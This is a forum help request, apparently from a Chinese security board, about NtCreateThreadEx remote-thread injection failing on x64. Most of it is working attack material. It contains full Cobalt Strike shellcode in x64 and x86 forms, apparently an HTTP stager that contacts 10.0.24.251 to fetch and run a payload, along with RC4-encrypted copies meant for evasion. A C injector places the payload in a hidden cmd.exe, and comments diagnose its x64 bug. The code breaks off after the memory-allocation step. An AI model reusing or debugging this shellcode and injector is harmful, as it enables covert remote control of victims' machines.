未解决 x64下NtCreateThreadEx远程线程注入shellcode失败
发表于: 2021-3-26 18:14 4486
问题:
x64下创建进程,使用NtAllocateVirtualMemory
,NtWriteVirtualMemory
,NtCreateThreadEx
进行远程线程注入 shellcode 失败,报错信息如下(报错截图在此页面中缺失)
但是如果 shellcode 提前用 RC4 加密,再在注入前解密,就可以正常注入
另外,x64 编译的代码无论是否加密,在 Win10 下都无法运行,而 x86 版本可以——Win10 对此有特殊保护吗?希望有大佬能帮忙解答,感激不尽!
环境:
shellcode 是 cobalt strike 生成的
win10 x64 + vs2015 非静态编译
测试机是 server2012 r2 x64
代码如下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 | #include "stdafx.h" #include <Windows.h> #include <winternl.h> #ifdef _M_X64 #define CMD L"c:\\windows\\system32\\cmd.exe" / / 原 shellcode #define SHELLCODE_C "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x9a\x1f\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\x
ff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x7a\x47\x36\x66\x00\xce\x01\x80\x3c\x44\x6d\x6f\xb7\x08\x6e\x92\xb7\xb0\x2f\x89\xc2\x9e\xec\x65\x8e\xec\xe2\x1b\x86\x11\x80\x3f\xe6\x12\xf2\x6f\x1a\x54\x10\x3d\xbd\x7f\x00\x4d\xa4\xd2\x7a\x6d\xe0\xec\x9d\x4a\xbc\xe9\xc2\xda\xcd\x21\xb1\x9b\x7c\xe7\x8b\x04\xa0\x41\x1f\x40\x41\x09\x7b\xb4\x2d\x98\x92\xc0\x62\x5f\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x3b\x20\x42\x4f\x49\x45\x39\x3b\x4e\x4c\x4e\x4c\x29\x0d\x0a\x00\xab\x02\x99\xd0\x20\x2e\x5a\x96\x4b\x0e\xf7\x2c\x25\xb3\xa2\xf0\x70\xbb\x02\x2e\xf8\xa0\x6b\x68\x09\x16\x90\xd3\xad\xd8\xbf\x23\x16\xda\x23\x45\xdd\x98\x8a\x38\x67\x7a\xa6\xfc\x3a\x5c\x05\xdf\xce\xe7\x8f\xc6\xce\x92\x27\x06\x81\xca\x3b\x83\x5e\xbb\x6a\x0f\x75\xad\xc4\x8f\x3f\x8d\x8a\x36\x5c\x03\x8f\x69\xe9\xee\x5e\x5a\x7c\x9b\xef\xee\x75\x93\x3a\xb3\x0d\xd6\x9d\x69\x31\x83\xd8\x27\xec\x15\xf2\xf1\xed\xd7\xe7\x19\xde\xeb\x45\x5f\xa6\xc6\xd0\x88\x3f\xda\x88\x43\x22\x0b\x08\x2c\x03\x08\x0f\xef\x31\x70\xa2\xb4\x19\xd9\x82\x59\x3c\x94\x43\x00\x3b\xc2\xf4\xea\xd9\xba\x42\x30\x73\xdf\x0c\xba\x40\x03\x99\xb8\x2d\x91\x57\x93\xf0\x35\x0e\x72\x6b\x29\x3f\xd2\x8e\xba\xa9\x83\x2e\x72\xdf\x8a\x92\x6d\x48\xe9\x1f\x0f\xc1\x6b\xf8\xeb\xb0\x14\x64\x48\x96\xba\xe2\xfb\x6d\x7a\x04\x92\xe6\xf6\x93\x03\xf2\x68\x54\xf6\x4c\xd4\xa4\x57\x0e\x89\x44\xc1\xce\xfc\xb7\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\x
b6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x30\x2e\x30\x2e\x32\x34\x2e\x32\x35\x31\x00\x12\x34\x56\x78" / / RC4加密 shellcode #define SHELLCODE_C_E "\x45\x8e\x0b\x2a\x99\xca\x0e\x92\x5a\xf1\xe9\x8b\xb3\xfa\x21\x30\xec\xfb\xda\xd1\xee\x1d\x94\x95\xca\xb2\xf6\x99\x0d\x83\xb6\xfa\x0c\x5d\x20\x97\xec\xcf\x6a\xbc\x58\x3b\x2d\x2d\x2c\xda\xb2\x27\x62\x15\x76\x9c\x03\x25\x9c\x7a\x5d\x91\x25\x37\x2a\x28\x2c\xa0\x57\x7d\x0b\xa9\x0e\x38\xa2\xc0\x1d\x08\x9c\x2b\x32\x85\x2d\x92\x94\x9f\xeb\x7b\x68\xb5\x3c\x7b\xdf\x86\x68\xa4\x0c\x42\xda\x99\x01\x27\x4c\xba\x7c\x1b\x58\x62\x8a\x4f\xc6\xba\x77\x83\x6a\x9e\x5e\xff\xbc\xc1\xa7\x38\x24\x7e\xdb\xcb\xa1\xad\x1d\x19\x15\x79\x70\xaa\x7a\xd7\x86\xbd\xe2\x50\x9d\xae\xc1\x04\xfa\xdc\x21\xa0\x9f\x55\x35\x80\x84\x32\x31\x01\xf1\x7e\xdd\x75\x6c\xfa\xf1\xf6\xe5\x14\x92\x70\x4c\x98\xb8\x9b\x46\x39\xd4\x3c\x5a\x04\xb0\xa2\xb1\x46\x84\x76\xfa\x11\xe3\xad\x07\x57\x60\x78\xa4\xa2\xf2\x2c\xbb\x60\xa6\x47\x01\x51\xd4\xe6\xac\x09\xbd\xa3\xbb\xf2\x36\xc7\xcc\xa6\x84\x72\xaf\xab\x86\x59\xc4\xa3\xc9\x57\x10\x7c\x42\x5e\x8c\x05\xd9\x2f\x2c\xc2\xdf\xed\xb4\x63\x2f\xa2\x9d\x76\xe8\x0d\x5e\x84\xa1\x12\x9e\x69\xd8\x5c\xcd\x87\x55\x98\x36\x69\xce\x9c\xa2\xae\x1c\xe0\xd5\x9e\x49\xa5\x09\x95\xce\xfc\xdf\x74\x2c\x39\x86\x5b\x8f\x65\x62\x7b\x62\x4b\xa9\xb8\xfa\x91\x4c\x04\x87\x8e\x7d\xf7\xd9\x2e\xef\xe5\x21\x95\x26\xb6\x3e\xb8\xb9\x13\x52\x75\x5c\x55\x83\xc8\x94\x69\x22\xc4\xfe\x5c\xbf\xc4\x8d\x07\xd9\x6a\xfa\x65\x7c\x87\x0a\x05\x3e\x12\x06\x15\x8c\xc2\x42\xd2\x4f\x90\xee\x9a\x3b\x08\xea\x29\x7a\xe7\x5c\x29\xdf\xe1\x11\xfb\xc1\x7a\xdc\xde\x36\x1d\x21\xd6\x26\xa7\xaa\x9d\x3e\xe8\x7c\xe5\x38\x49\x83\xba\x2f\xd7\x33\x66\x59\x56\xea\x36\x11\xef\x8b\xf0\xfa\x4a\x61\xf6\x03\x14\xb1\x87\x83\x65\xe2\x3d\x75\x2f\x2c\x45\x23\x1c\xa9\x8a\x0c\xfb\xad\xf2\x09\x24\x71\x35\xcd\x42\x0f\xce\x52\x28\xf3\xdc\x99\xb0\x35\xad\x41\x69\xb5\xee\x3e\x8a\x7a\x8f\xbc\x14\x40\xdb\x4f\xd0\x28\xc8\x4a\xe1\x80\x1e\x17\xd7\xcc\x7b\
x88\xc1\x91\x92\xf4\xde\x89\x6a\x90\x6a\xa5\x6d\x68\x32\xe7\x23\x3c\x1e\xd0\x87\xc2\x29\xa3\xec\x70\x58\xf7\x03\x7e\x87\x30\xc5\x43\x5d\xc7\xd5\x72\xd0\x69\x51\x75\xa4\xd5\x7e\x4f\x5d\x51\xd4\xae\xb9\xbe\x4b\xeb\x1f\x3c\xf7\xf4\x86\xfe\x06\x98\x6c\xed\xaf\x43\x3e\x81\xf8\x6f\x7d\x47\x94\xa3\xab\x8e\xcb\xe0\x3f\xaa\xed\xc8\xa6\x12\xbb\xc3\x77\xf3\xc8\x52\x3b\x26\x0a\x3b\x66\xac\x38\x2c\xb9\x0a\xdc\xfd\xed\xa4\x86\x10\x1d\xd2\x23\xd5\xba\x4a\x68\x74\x1f\xf1\xbe\x96\x0a\x23\xb0\xe2\x9c\x8f\xf2\x51\x18\xf1\x28\x09\xe1\x6e\xf7\x79\x4d\xa5\x2b\xd6\x7e\x03\x82\x23\xe3\x24\x88\x10\x02\x20\x3e\x2c\x68\x50\x56\x12\x7f\x1c\x5c\xa2\xf9\x0c\x31\x40\xbc\x8c\x91\x02\x25\xc9\x68\x26\xc2\x62\x64\x4a\x98\x57\xfb\xe1\x18\x18\x17\xd3\x73\x0c\x07\xb8\x7c\xfd\x6d\x6a\x3c\x94\x74\xf3\x30\x0d\x16\x5b\xc5\x9e\xa8\x0d\x90\x46\x05\x8f\xda\xd1\xc8\x17\x14\x09\xc9\xb9\x30\x4d\x69\x6b\x4a\x29\xda\xbf\x09\x27\xf2\xa5\xc4\xff\x47\x91\xa4\x1c\xe0\x87\x27\xcd\x85\x08\x29\xcc\x29\x63\x1d\x23\xcb\x91\x8a\x52\x09\x79\xb1\x34\xdd\x5c\x3f\xa4\x68\xd9\x72\xdd\xd5\x83\x5b\x67\x71\xc0\xcc\xff\xc1\x0e\x7b\xd7\xbd\x1f\x91\x44\x6c\xf0\x56\x59\x0c\xcb\x0f\x0a\xd6\x42\xc5\xa8\x6c\x74\xfb\xa4\x98\x59\x5e\xa6\x6a\x7a\x24\x6c\x28\x5c\xc1\xb3\x9b\x57\xd1\x1a\x06\x14\x13\x7e\x23\x79\x10\x17\xa9\x9b\xac\x4f\x50\x75\x8c\xf0\xe5\x32\xbf\xee\x1f\x87\xb6\x4e\xc4\x3a\x33\xe1\x7c\xff\x10\x7e\xd8\x75\x2c\x13\x75\x55\x48\xa1\xd3\x50\x43\x10\x7f\x55\x41\x3c\xe4\xf2\x5d\x55\xd9\x99\x3b\x99\x39\x40\xf7\xa2\x7b\x99\x4e\x06\xe3\xde\xb5\x86\xcc\xa9\xf7\xda\x41\x49\xeb\xe8\x8e\x6b\xc4\x48\x57\x63\xd3\xae\x90\x97\x25\x90\x5e\x7c\xd9\x3b\x66\x0f\x4b\x2d\xdd\xea\x52\x75\x5f\xe5\x02\xd4\x88\x9d\x5b\xaa\x67\x90\xfb\x07\x43\x3d\xf6\xf2\x4d\x97\x6c\xbe\xcd\x4c\x96\xf0\x45\x9d\xc1\x2c\xbf\xcf\x46\xfc\x53\x46\xed\x33\x49" #else #define CMD L"c:\\windows\\syswow64\\cmd.exe" #define SHELLCODE_C 
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\x9a\x1f\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x40\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00\x00\xe8\x8b\xff\xff\xff\x2f\x36\x78\x58\x56\x00\xee\x6b\xfa\x21\x74\xa6\x7e\xd1\x75\x2f\x63\x97\xd9\xf8\x2b\xf6\xc3\x50\xb3\x40\x41\x07\xc6\x22\x3d\x9d\x1a\x78\x40\x6e\x98\x97\x89\x41\x38\xce\x2e\x9c\x45\xf9\xb0\x03\x4d\xc2\x59\x1b\x21\x60\x29\xa6\x81\x43\x87\xd6\xf8\x6e\xa0\xa0\x1b\xb6\x59\x01\xfe\x63\x9a\x4c\x98\x5d\x7c\xb0\x46\xcd\xd8\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x34\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x38\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x29\x0d\x0a\x00\x8b\x64\x12\x4e\xce\x87\x38\x2e\xf5\xde\xb7\xb6\x2a\x4a\x5e\xdb\xb0\x8e\x21\x00\xb8\x52\x98\xdb\xdb\x08\x79\x4e\xb4\x9c\x32\x7
c\xe2\x44\xbd\x42\x9a\x42\x93\x7b\xfc\x05\x1c\x3d\xe3\xf1\x82\x00\xad\x8b\x62\x30\xa3\x8f\xe5\x5b\xee\x97\xe9\xbc\x50\x2d\x5b\xbd\x47\x89\xbc\xac\xf5\x1e\x8b\x0b\x61\x3c\x4a\x9a\x0b\x9e\x3e\xe8\x9a\x98\x3d\x38\x65\x4f\xa4\x7f\x1e\xfa\xd3\xe9\x87\x95\xdb\x97\xcc\x6d\x52\x5f\x03\x5b\xe6\x48\xfc\x79\x59\x8f\x3d\x38\x32\x45\x45\x0e\x5f\x5d\x34\x8a\x15\xe5\x5b\x3a\x25\x22\xa7\x43\x2b\x50\xb4\x54\x7d\x68\xa4\x55\xac\x0a\x1e\xc6\xf5\xcb\x23\x88\x73\xf7\xce\x81\x4e\xfc\x88\xf0\x1c\xa0\x13\x75\x9f\x77\x9c\x82\xdb\x90\xfb\xee\x44\xe1\x3f\x98\xd1\x9f\xf7\x27\x39\xa6\xb8\x9c\xc9\xaf\x76\x86\x59\x75\x97\xdc\xc9\xb6\xad\x9d\xeb\x00\x43\x51\xbf\x51\xe2\x6a\x61\xc2\x7a\x7c\xac\x9e\x37\xe3\x0d\xb6\xb6\xe6\xc3\xf3\x7f\x26\xa7\x2e\x7a\x63\xce\xf5\x38\xb0\xdf\x90\xf7\x35\x78\xe0\xcc\x8b\x46\xf1\x5e\x00\xf9\x8a\xdd\x8c\x5f\xf8\x58\x8a\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9\xfd\xff\xff\x31\x30\x2e\x30\x2e\x32\x34\x2e\x32\x35\x31\x00\x12\x34\x56\x78" #define SHELLCODE_C_E 
"\x45\x2e\x01\xce\x69\x22\xa6\x1b\xbf\xc0\x7a\xbe\x79\xf8\x43\xea\xe8\xbf\x60\x51\x9f\xde\x6d\xef\xa5\x4d\x37\xed\x24\x34\x0c\x68\x80\x29\xca\x99\xbe\xab\x45\xca\xdd\x7c\x61\xdb\x07\x62\xd1\xb0\x45\x7b\x07\x6b\x43\x35\xbd\xeb\x17\x18\x50\xf3\xeb\x9d\x84\x4c\xd5\x6c\xd1\xa9\x9d\xe1\xda\x6b\x5e\xe7\x37\x16\xab\x68\x98\x61\x8d\x42\xd8\xf1\x2b\xfe\x10\x32\x10\x8b\x69\x2b\xb1\x62\xdb\x0a\x4a\x5b\x64\xd1\x8a\x77\x35\xc4\x59\x84\xbe\xd7\x77\x80\xef\x43\x1a\x4b\xfe\xd8\x30\x0d\x7f\xbd\xde\x96\xed\x4c\x5d\x15\x00\x9d\x87\xb0\xda\x47\xd1\xad\x1c\x71\xfd\x11\xee\x7e\xa4\x34\xeb\xd9\xff\x7e\x69\x25\xf1\x82\x1e\x2c\x14\x57\xad\x54\x21\x5d\xb1\xb0\x91\xcd\xeb\xcb\x90\x8f\xf3\x85\x10\x81\xaf\xe1\x27\x2b\x07\x76\x88\x83\xdc\x37\xa2\x14\x8b\x3e\x17\x5e\x4b\x22\xb4\xa9\xd2\x35\x48\x40\xe7\x46\xae\xd9\xdb\x2e\x6a\x95\x0a\xfd\x42\x6b\x22\x09\xe1\x0b\xb1\x18\xad\xa2\xbc\x7c\xff\x9f\xf3\x6b\x25\x60\xa9\x4a\xf4\x77\xaf\x1c\xe9\x8d\xad\x6f\x5e\x1e\xa7\xd3\xcd\xe3\xc2\x16\x39\x25\xc4\x25\x54\x5f\x16\x49\x05\x76\x93\x5d\xa5\x29\x9e\xdd\x29\x6b\xcf\x6f\x06\x65\x15\xb7\x91\xc6\xee\xdf\xdb\xd7\xc9\x5c\x4c\xd2\x4e\x40\x16\x93\x7d\x2b\x17\x3c\xa1\x6d\x5a\x3f\xc1\x65\x7c\x2e\x2e\x5f\x47\xd0\xc1\x33\xa8\x41\xb7\x56\xf1\x22\xb9\xfb\xa1\x3a\xff\x06\xb4\xaa\x4b\xc4\xfc\xf5\xf2\x97\xdf\x46\x8b\x0a\x50\xb4\xb8\x57\xe9\x35\xef\x82\x4e\x78\x24\x68\x09\xac\xb6\xa6\xb6\x1e\x5c\xe2\xa7\xb9\x45\x0c\x55\x15\x70\xad\x1c\x8b\x0f\xee\xac\xa2\x11\x2a\x5f\x8e\x33\xc0\xe8\x91\xbf\xdf\x37\x56\xa5\x0c\x7a\x42\xd3\x55\xfe\xbb\xce\x76\x8a\x1f\x5c\xbd\x21\x93\x2d\xb2\x0f\xbe\x01\xf0\xf8\x21\xad\xe1\xc6\x91\x5f\xb7\xbf\x38\x13\x66\x20\x3f\x63\x19\xd6\xf9\xe9\xbe\x80\x7d\x21\xee\xe5\x18\x17\xeb\x70\x44\xeb\x5a\x48\x4c\x51\xbb\x89\x2c\x71\xb8\x4d\xf0\xec\xd9\x5e\xaf\x6b\x16\x96\xd7\x1c\x21\x21\xd0\x14\x2e\x05\x81\x7c\x3c\x8b\x03\x38\xcb\x00\x85\xfb\xbd\x97\x52\x66\x27\xce\x6e\xa6\x02\x61\x18\x08\x4b\x77\x88\x37\x65\x5c\xf6\x6b\xe8\xa2\x7e\x9a\x9f\xd7\xbf\x61\x64\xa3\xb6\x38\xc8\x0c\x03\xe2\xa8\xba\xfc\xff\x94\x65\xba\xa9\x0
2\xaa\xda\x2b\xa8\x01\x7f\x2b\x5a\x42\xe3\x1a\x23\x5b\x27\xdd\x46\xca\x48\xa8\xf5\x49\x2b\x72\x17\x64\x34\x75\x3a\x74\xb8\xa9\xf1\x94\x15\x9c\xfe\xb7\x71\xde\x19\xe2\x31\x48\x13\x3a\x62\x81\x4a\x77\x5b\x14\x1e\xf9\x20\x3f\x89\x7d\x9f\xad\xf6\xdd\x29\xd4\x4d\xcf\xf3\xea\x55\xc7\xa7\x40\x7c\x28\xe2\xf2\x9e\x23\x74\x49\x26\x18\x85\xe2\x4b\x3e\x1e\xa6\xd5\xd2\x6a\x8a\x03\x91\xa7\x24\x7d\x39\x9a\xe5\x2f\xdf\x73\xa8\x0f\x28\xab\xb0\xa8\x61\xfe\xfe\x14\xc9\x7b\x4f\x38\x6b\x5e\x6d\xbb\x1a\x35\x14\x60\xf1\x38\xcc\x6c\xc8\x64\x76\xab\x9e\xf6\x34\xca\x8a\xbd\x94\xcc\xc9\x11\x7d\x84\x9d\xbd\x6e\x56\xdc\x0f\xdb\x05\x4d\xd6\x24\x33\xa6\x8d\xf4\x90\x42\xd4\xed\x91\x8d\x4d\x56\xc8\xb6\xd7\x78\xfa\x76\x7b\xda\x14\x41\xcd\x28\x25\xb4\xee\xc9\x33\xc5\xe9\x1e\x39\xcd\x27\x6b\x33\xa2\x16\x7c\x40\x51\x1f\x51\x5f\xa0\x5e\xc4\xba\xf6\x80\x8f\x89\xd7\xc7\xfb\x22\x2d\x85\x33\xa8\x4f\x88\x01\xe3\x2f\x2d\xcf\x84\x97\xb6\x35\xe4\x7c\x00\xce\xaa\xc5\xd4\xaf\xab\xbb\x97\x98\x35\x5f\x58\x9b\x63\x81\x87\x9d\x13\x51\x40\x3a\xab\x4d\xc2\x9a\xf7\x7b\xa9\x69\x87\x96\xda\x17\x0c\x2d\x8c\x7c\x04\x77\xa1\x3c\x36\xbc\x47\x05\xe0\x17\x8c\x67\x9a\x2f\x99\x99\x11\x99\x50\x41\x02\x61\x40\x25\xf0\xb3\xf7\x06\x3b" #endif #define KEY "20@10315" typedef NTSTATUS(NTAPI * TNtAllocateVirtualMemory)( / / 定义 NtAllocateVirtualMemory 原型 HANDLE ProcessHandle, PVOID * BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect); TNtAllocateVirtualMemory NtAllocateVirtualMemory = NULL; typedef NTSTATUS(NTAPI * TNtWriteVirtualMemory)( / / 定义 NtWriteVirtualMemory 原型 HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer , ULONG NumberOfBytesToWrite, PULONG NumberOfBytesWritten OPTIONAL); TNtWriteVirtualMemory NtWriteVirtualMemory = NULL; typedef NTSTATUS(NTAPI * TNtCreateThreadEx)( / / 定义 NtCreateThreadEx 原型 PHANDLE hThread, ACCESS_MASK DesiredAccess, PVOID ObjectAttributes, HANDLE ProcessHandle, PVOID lpStartAddress, PVOID lpParameter, ULONG Flags, SIZE_T StackZeroBits, SIZE_T SizeOfStackCommit, 
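SIZE_T SizeOfStackReserve, PVOID lpBytesBuffer);
TNtCreateThreadEx NtCreateThreadEx = NULL;

/* winternl.h does not define NT_SUCCESS; an NTSTATUS failure code has the sign bit set. */
#ifndef NT_SUCCESS
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
#endif

/*
 * RC4Crypt - RC4 over Data[0..Length) in place.  Encrypting and decrypting are
 * the same operation, so this is used for both.
 *
 * Key/KeyLength: KeyLength bytes of Key are cycled to fill the 256-byte key
 * schedule.  Whether a trailing NUL counts as part of the key (sizeof on a
 * string literal includes it) must match the tool that produced the ciphertext.
 */
void RC4Crypt(unsigned char Data[], unsigned long Length, unsigned char Key[], unsigned long KeyLength)
{
    unsigned char s[256], k[256];
    unsigned char t;
    unsigned int i, j;
    unsigned long n;

    /* KSA: identity permutation, then scramble it with the repeated key. */
    for (i = 0; i < 256; i++) {
        s[i] = (unsigned char)i;
        k[i] = Key[i % KeyLength];
    }
    for (i = 0, j = 0; i < 256; i++) {
        j = (j + s[i] + k[i]) & 0xFF;
        t = s[i]; s[i] = s[j]; s[j] = t;
    }

    /* PRGA: one keystream byte per data byte, XORed into the buffer. */
    for (n = 0, i = 0, j = 0; n < Length; n++) {
        i = (i + 1) & 0xFF;
        j = (j + s[i]) & 0xFF;
        t = s[i]; s[i] = s[j]; s[j] = t;
        Data[n] ^= s[(s[i] + s[j]) & 0xFF];
    }
}

/*
 * Spawn a hidden cmd.exe of the same bitness as this build (see CMD), copy the
 * payload into it, and start it on a new thread through the ntdll wrappers
 * resolved above.
 *
 * Returns 0 on success, otherwise a small non-zero code naming the step that
 * failed (1 ntdll, 2 GetProcAddress, 3 CreateProcess, 4 allocate, 5 write,
 * 6 create thread).  The failing NTSTATUS is left in `status` for the debugger.
 */
int main(void)
{
    unsigned char buf[] = SHELLCODE_C;
    unsigned char key[] = KEY;
    /* Uncomment together with SHELLCODE_C_E to decrypt a pre-encrypted payload.
     * sizeof includes the string literal's trailing NUL for both buf and key;
     * the encryptor must have used the same lengths. */
    /* RC4Crypt(buf, sizeof buf, key, sizeof key); */

    HMODULE hNtdll = LoadLibraryW(L"ntdll");
    if (hNtdll == NULL) {
        return 1;
    }
    NtAllocateVirtualMemory = (TNtAllocateVirtualMemory)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");
    NtWriteVirtualMemory = (TNtWriteVirtualMemory)GetProcAddress(hNtdll, "NtWriteVirtualMemory");
    NtCreateThreadEx = (TNtCreateThreadEx)GetProcAddress(hNtdll, "NtCreateThreadEx");
    if (NtAllocateVirtualMemory == NULL || NtWriteVirtualMemory == NULL || NtCreateThreadEx == NULL) {
        return 2;
    }

    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    ZeroMemory(&si, sizeof si);
    ZeroMemory(&pi, sizeof pi);
    si.cb = sizeof si;
    if (!CreateProcess(CMD, NULL, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi)) {
        return 3;
    }
    /* Let cmd.exe finish loading before touching it.  Waiting on the process
     * handle only returns early if cmd.exe exits, so this is a 1 s pause. */
    WaitForSingleObject(pi.hProcess, 1000);

    int rc = 0;
    NTSTATUS status = 0;
    PVOID remote_buf = NULL;
    HANDLE hRemoteThread = NULL;
    /* RegionSize is PSIZE_T: on x64 the kernel reads and writes 8 bytes through
     * it.  The original code passed the address of a 4-byte unsigned int, so the
     * high dword was whatever lay next to it on the stack (an invalid or huge
     * region size) and the rounded-up size written back clobbered the adjacent
     * stack slot.  That is the most likely cause of the x64-only failure, and
     * explains why a different local layout (the RC4 variant) happened to work. */
    SIZE_T region_size = sizeof buf;

    status = NtAllocateVirtualMemory(pi.hProcess, &remote_buf, 0, &region_size,
                                     MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (!NT_SUCCESS(status)) {
        rc = 4;
        goto cleanup;
    }
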